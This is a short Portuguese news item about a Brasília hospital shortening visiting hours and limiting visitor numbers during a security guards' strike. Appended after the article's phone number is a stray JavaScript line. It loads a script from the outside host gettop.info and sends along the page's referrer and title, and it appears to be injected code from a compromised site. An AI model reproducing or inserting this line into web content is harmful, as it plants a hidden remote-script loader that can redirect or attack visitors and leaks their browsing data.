Devido à paralisação dos vigilantes, iniciada nesta segunda-feira (10), o Hospital de Base do Distrito Federal (HBDF) modificou o horário de visitas aos pacientes internados na unidade. Além disso, a alteração também reduziu o número de visitantes permitidos em cada unidade.
O objetivo do plano de contingenciamento, feito pela direção do HBDF, é viabilizar o controle diário de entrada e saída de pessoas, além de oferecer proteção à população e servidores do local. A unidade recebe cerca de 1.000 visitas diárias.
MUDANÇAS – A partir desta terça-feira (11), o novo horário de visitas passa a ser das 15h às 17h enquanto durar a greve. A modificação será aplicada em todas as unidades do hospital, como pronto socorro, terapia intensiva, centro cirúrgico e na internação.
Quanto ao número de visitantes, apenas o pronto socorro e o prédio da internação poderão receber duas pessoas. Na Unidade de Terapia Intensiva (UTI) e o centro cirúrgico, será autorizada uma pessoa.
COMO ERA – O antigo horário de visitação era das 11h às 17h, nos andares do prédio internação; das 14h às 17h, no pronto socorro; das 16h às 17h na UTI e de 15h às 16h, no centro cirúrgico. O número de visitantes era de uma a cinco pessoas, com variações em cada unidade.
Para mais informações, ligue: 3315-1441
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;